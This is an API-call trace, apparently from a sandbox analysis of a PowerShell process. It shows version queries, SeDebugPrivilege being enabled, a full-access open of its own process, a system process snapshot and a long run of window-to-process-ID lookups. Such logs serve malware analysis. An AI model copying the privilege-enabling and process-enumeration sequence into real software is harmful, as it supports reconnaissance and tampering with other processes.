	[0201.505] VerQueryValueW (in: pBlock=0x2935ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xaee34, puLen=0xaee30 | out: lplpBuffer=0xaee34*=0x2935e30, puLen=0xaee30) returned 1
	[0201.505] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0201.505] lstrcpyW (in: lpString1=0x3582a0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0201.505] VerQueryValueW (in: pBlock=0x2935ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xaee34, puLen=0xaee30 | out: lplpBuffer=0xaee34*=0x2935e94, puLen=0xaee30) returned 1
	[0201.505] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0201.505] lstrcpyW (in: lpString1=0x3582a0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0201.505] VerQueryValueW (in: pBlock=0x2935ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xaee34, puLen=0xaee30 | out: lplpBuffer=0xaee34*=0x2935f10, puLen=0xaee30) returned 1
	[0201.505] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0201.505] lstrcpyW (in: lpString1=0x3582a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0201.505] VerQueryValueW (in: pBlock=0x2935ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xaee34, puLen=0xaee30 | out: lplpBuffer=0xaee34*=0x2935bb8, puLen=0xaee30) returned 1
	[0201.505] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0201.506] lstrcpyW (in: lpString1=0x3582a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0201.506] VerQueryValueW (in: pBlock=0x2935ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xaee34, puLen=0xaee30 | out: lplpBuffer=0xaee34*=0x0, puLen=0xaee30) returned 0
	[0201.506] VerQueryValueW (in: pBlock=0x2935ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xaee34, puLen=0xaee30 | out: lplpBuffer=0xaee34*=0x0, puLen=0xaee30) returned 0
	[0201.506] VerQueryValueW (in: pBlock=0x2935ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xaee34, puLen=0xaee30 | out: lplpBuffer=0xaee34*=0x0, puLen=0xaee30) returned 0
	[0201.506] VerQueryValueW (in: pBlock=0x2935ac4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xaee28, puLen=0xaee24 | out: lplpBuffer=0xaee28*=0x2935b60, puLen=0xaee24) returned 1
	[0201.508] VerLanguageNameW (in: wLang=0x0, szLang=0x3582a0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0201.510] VerQueryValueW (in: pBlock=0x2935ac4, lpSubBlock="\\", lplpBuffer=0xaee3c, puLen=0xaee38 | out: lplpBuffer=0xaee3c*=0x2935aec, puLen=0xaee38) returned 1
	[0201.519] GetCurrentProcessId () returned 0x728
	[0201.532] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xae674 | out: lpLuid=0xae674*(LowPart=0x14, HighPart=0)) returned 1
	[0201.633] GetLastError () returned 0x0
	[0201.636] GetCurrentProcess () returned 0xffffffff
	[0201.636] GetLastError () returned 0x0
	[0201.640] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0xae670 | out: TokenHandle=0xae670*=0x314) returned 1
	[0201.640] GetLastError () returned 0x0
	[0201.643] AdjustTokenPrivileges (in: TokenHandle=0x314, DisableAllPrivileges=0, NewState=0x2938604*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0201.643] GetLastError () returned 0x0
	[0201.645] CloseHandle (hObject=0x314) returned 1
	[0201.645] GetLastError () returned 0x0
	[0201.650] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x728) returned 0x314
	[0201.650] GetLastError () returned 0x0
	[0201.661] EnumProcessModules (in: hProcess=0x314, lphModule=0x2938648, cb=0x100, lpcbNeeded=0xaee64 | out: lphModule=0x2938648, lpcbNeeded=0xaee64) returned 1
	[0201.662] GetLastError () returned 0x0
	[0201.664] GetModuleInformation (in: hProcess=0x314, hModule=0x221d0000, lpmodinfo=0x2938788, cb=0xc | out: lpmodinfo=0x2938788*(lpBaseOfDll=0x221d0000, SizeOfImage=0x72000, EntryPoint=0x221d7363)) returned 1
	[0201.664] GetLastError () returned 0x0
	[0201.667] GetModuleBaseNameW (in: hProcess=0x314, hModule=0x221d0000, lpBaseName=0x358a60, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0201.667] GetLastError () returned 0x0
	[0201.668] GetModuleFileNameExW (in: hProcess=0x314, hModule=0x221d0000, lpFilename=0x358a60, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0201.668] GetLastError () returned 0x0
	[0201.669] CloseHandle (hObject=0x314) returned 1
	[0201.669] GetLastError () returned 0x0
	[0201.670] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x728) returned 0x314
	[0201.670] GetLastError () returned 0x0
	[0201.672] GetExitCodeProcess (in: hProcess=0x314, lpExitCode=0x2937c38 | out: lpExitCode=0x2937c38*=0x103) returned 1
	[0201.672] GetLastError () returned 0x0
	[0201.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3935278, Length=0x20000, ResultLength=0xaeeac | out: SystemInformation=0x3935278, ResultLength=0xaeeac*=0xfa70) returned 0x0
	[0201.907] EnumWindows (lpEnumFunc=0x2833612, lParam=0x0) returned 1
	[0201.910] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.910] GetLastError () returned 0x0
	[0201.910] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.910] GetLastError () returned 0x0
	[0201.910] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.910] GetLastError () returned 0x0
	[0201.910] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.910] GetLastError () returned 0x0
	[0201.910] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.911] GetLastError () returned 0x0
	[0201.911] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.911] GetLastError () returned 0x0
	[0201.911] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.911] GetLastError () returned 0x0
	[0201.911] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.911] GetLastError () returned 0x0
	[0201.911] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.911] GetLastError () returned 0x0
	[0201.912] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.912] GetLastError () returned 0x0
	[0201.912] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x538
	[0201.912] GetLastError () returned 0x0
	[0201.912] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.912] GetLastError () returned 0x0
	[0201.912] GetWindowThreadProcessId (in: hWnd=0x300ee, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.912] GetLastError () returned 0x0
	[0201.912] GetWindowThreadProcessId (in: hWnd=0x400c0, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.912] GetLastError () returned 0x0
	[0201.912] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x514
	[0201.912] GetLastError () returned 0x0
	[0201.913] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.913] GetLastError () returned 0x0
	[0201.913] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x778
	[0201.913] GetLastError () returned 0x0
	[0201.913] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x778
	[0201.913] GetLastError () returned 0x0
	[0201.913] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x458
	[0201.913] GetLastError () returned 0x0
	[0201.913] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.913] GetLastError () returned 0x0
	[0201.913] GetWindowThreadProcessId (in: hWnd=0xa0266, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0xa18
	[0201.913] GetLastError () returned 0x0
	[0201.913] GetWindowThreadProcessId (in: hWnd=0x14017c, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x978
	[0201.914] GetLastError () returned 0x0
	[0201.914] GetWindowThreadProcessId (in: hWnd=0x5026a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x838
	[0201.914] GetLastError () returned 0x0
	[0201.914] GetWindowThreadProcessId (in: hWnd=0x50160, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0xb2c
	[0201.914] GetLastError () returned 0x0
	[0201.914] GetWindowThreadProcessId (in: hWnd=0x40298, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x8d4
	[0201.914] GetLastError () returned 0x0
	[0201.914] GetWindowThreadProcessId (in: hWnd=0x4015e, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x874
	[0201.914] GetLastError () returned 0x0
	[0201.914] GetWindowThreadProcessId (in: hWnd=0x50268, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x9a8
	[0201.914] GetLastError () returned 0x0
	[0201.914] GetWindowThreadProcessId (in: hWnd=0x60106, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0xb40
	[0201.915] GetLastError () returned 0x0
	[0201.915] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0xa00
	[0201.915] GetLastError () returned 0x0
	[0201.915] GetWindowThreadProcessId (in: hWnd=0x900a6, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.915] GetLastError () returned 0x0
	[0201.915] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.915] GetLastError () returned 0x0
	[0201.915] GetWindowThreadProcessId (in: hWnd=0x400d0, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.915] GetLastError () returned 0x0
	[0201.915] GetWindowThreadProcessId (in: hWnd=0x400f0, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.915] GetLastError () returned 0x0
	[0201.916] GetWindowThreadProcessId (in: hWnd=0x300de, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.916] GetLastError () returned 0x0
	[0201.916] GetWindowThreadProcessId (in: hWnd=0x300ca, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.916] GetLastError () returned 0x0
	[0201.916] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.916] GetLastError () returned 0x0
	[0201.916] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0201.916] GetLastError () returned 0x0
	[0201.916] GetWindowThreadProcessId (in: hWnd=0x1025e, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x9f0
	[0201.916] GetLastError () returned 0x0
	[0201.917] GetWindowThreadProcessId (in: hWnd=0x10258, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x9e0
	[0201.917] GetLastError () returned 0x0
	[0201.917] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x9d0
	[0201.917] GetLastError () returned 0x0
	[0201.917] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x9c0
	[0201.917] GetLastError () returned 0x0
	[0201.917] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x9b0
	[0201.917] GetLastError () returned 0x0
	[0201.917] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x9a0
	[0201.917] GetLastError () returned 0x0
	[0201.918] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x990
	[0201.918] GetLastError () returned 0x0
	[0201.918] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x980
	[0201.918] GetLastError () returned 0x0
	[0201.918] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x970
	[0201.918] GetLastError () returned 0x0
	[0201.918] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x960
	[0201.918] GetLastError () returned 0x0
	[0201.918] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x950
	[0201.918] GetLastError () returned 0x0
	[0201.918] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x940
	[0201.918] GetLastError () returned 0x0
	[0201.919] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x930
	[0201.919] GetLastError () returned 0x0
	[0201.919] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x920
	[0201.919] GetLastError () returned 0x0
	[0201.919] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x910
	[0201.919] GetLastError () returned 0x0
	[0201.919] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x900
	[0201.919] GetLastError () returned 0x0
	[0201.919] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x8f0
	[0201.919] GetLastError () returned 0x0
	[0201.919] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x8e0
	[0201.920] GetLastError () returned 0x0
	[0201.920] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x8d0
	[0201.920] GetLastError () returned 0x0
	[0201.920] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x8c0
	[0201.920] GetLastError () returned 0x0
	[0201.920] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x8b0
	[0201.920] GetLastError () returned 0x0
	[0201.920] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x8a0
	[0201.920] GetLastError () returned 0x0
	[0201.920] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x890
	[0201.920] GetLastError () returned 0x0
	[0201.921] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x880
	[0201.921] GetLastError () returned 0x0
	[0201.921] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x870
	[0201.921] GetLastError () returned 0x0
	[0201.921] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x860
	[0201.921] GetLastError () returned 0x0
	[0201.921] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x850
	[0201.921] GetLastError () returned 0x0
	[0201.921] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x840
	[0201.921] GetLastError () returned 0x0
	[0201.922] GetWindowThreadProcessId (in: hWnd=0x101ec, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x830
	[0201.922] GetLastError () returned 0x0
	[0201.922] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x820
	[0201.922] GetLastError () returned 0x0
	[0201.922] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x810
	[0201.922] GetLastError () returned 0x0
	[0201.922] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x20c
	[0201.922] GetLastError () returned 0x0
	[0201.922] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x7c4
	[0201.922] GetLastError () returned 0x0
	[0201.922] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0xc0
	[0201.923] GetLastError () returned 0x0
	[0201.923] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x688
	[0201.923] GetLastError () returned 0x0
	[0201.923] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x6c0
	[0201.923] GetLastError () returned 0x0
	[0201.923] GetWindowThreadProcessId (in: hWnd=0x101cc, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x408
	[0201.923] GetLastError () returned 0x0
	[0201.923] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x7d4
	[0201.923] GetLastError () returned 0x0
	[0201.923] GetWindowThreadProcessId (in: hWnd=0x101c4, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x544
	[0201.923] GetLastError () returned 0x0
	[0201.924] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x540
	[0201.924] GetLastError () returned 0x0
	[0201.924] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x71c
	[0201.924] GetLastError () returned 0x0
	[0201.924] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x31c
	[0201.924] GetLastError () returned 0x0
	[0201.924] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x7ec
	[0201.924] GetLastError () returned 0x0
	[0201.924] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x5b8
	[0201.924] GetLastError () returned 0x0
	[0201.925] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x754
	[0201.925] GetLastError () returned 0x0
	[0201.925] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x664
	[0201.925] GetLastError () returned 0x0
	[0201.925] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x640
	[0201.925] GetLastError () returned 0x0
	[0201.925] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x700
	[0201.925] GetLastError () returned 0x0
	[0201.925] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x410
	[0201.926] GetLastError () returned 0x0
	[0201.926] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x7a0
	[0201.926] GetLastError () returned 0x0
	[0201.926] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x3b4
	[0201.926] GetLastError () returned 0x0
	[0201.926] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x5cc
	[0201.926] GetLastError () returned 0x0
	[0201.926] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x5d4
	[0201.926] GetLastError () returned 0x0
	[0201.926] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x7c0
	[0201.926] GetLastError () returned 0x0
	[0201.926] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x364
	[0201.926] GetLastError () returned 0x0
	[0201.926] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x240
	[0201.926] GetLastError () returned 0x0
	[0201.927] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x560
	[0201.927] GetLastError () returned 0x0
	[0201.927] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x57c
	[0201.927] GetLastError () returned 0x0
	[0201.927] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x7b0
	[0201.927] GetLastError () returned 0x0
	[0202.132] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x6a4
	[0202.132] GetLastError () returned 0x0
	[0202.132] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x32c
	[0202.132] GetLastError () returned 0x0
	[0202.132] GetWindowThreadProcessId (in: hWnd=0x20164, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x670
	[0202.132] GetLastError () returned 0x0
	[0202.133] GetWindowThreadProcessId (in: hWnd=0x30158, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4f0
	[0202.133] GetLastError () returned 0x0
	[0202.133] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x514
	[0202.133] GetLastError () returned 0x0
	[0202.133] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x50c
	[0202.133] GetLastError () returned 0x0
	[0202.133] GetWindowThreadProcessId (in: hWnd=0x20142, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x514
	[0202.133] GetLastError () returned 0x0
	[0202.133] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x50c
	[0202.133] GetLastError () returned 0x0
	[0202.134] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x514
	[0202.134] GetLastError () returned 0x0
	[0202.134] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4f0
	[0202.134] GetLastError () returned 0x0
	[0202.134] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4f0
	[0202.134] GetLastError () returned 0x0
	[0202.134] GetWindowThreadProcessId (in: hWnd=0x200a8, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x58c
	[0202.134] GetLastError () returned 0x0
	[0202.134] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x578
	[0202.134] GetLastError () returned 0x0
	[0202.135] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x458
	[0202.135] GetLastError () returned 0x0
	[0202.135] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x530
	[0202.135] GetLastError () returned 0x0
	[0202.135] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0202.135] GetLastError () returned 0x0
	[0202.135] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x508
	[0202.135] GetLastError () returned 0x0
	[0202.135] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0202.135] GetLastError () returned 0x0
	[0202.135] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4f4
	[0202.135] GetLastError () returned 0x0
	[0202.136] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0202.136] GetLastError () returned 0x0
	[0202.136] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0202.136] GetLastError () returned 0x0
	[0202.136] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x794
	[0202.136] GetLastError () returned 0x0
	[0202.136] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0202.136] GetLastError () returned 0x0
	[0202.136] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0202.137] GetLastError () returned 0x0
	[0202.137] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x458
	[0202.137] GetLastError () returned 0x0
	[0202.137] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x458
	[0202.137] GetLastError () returned 0x0
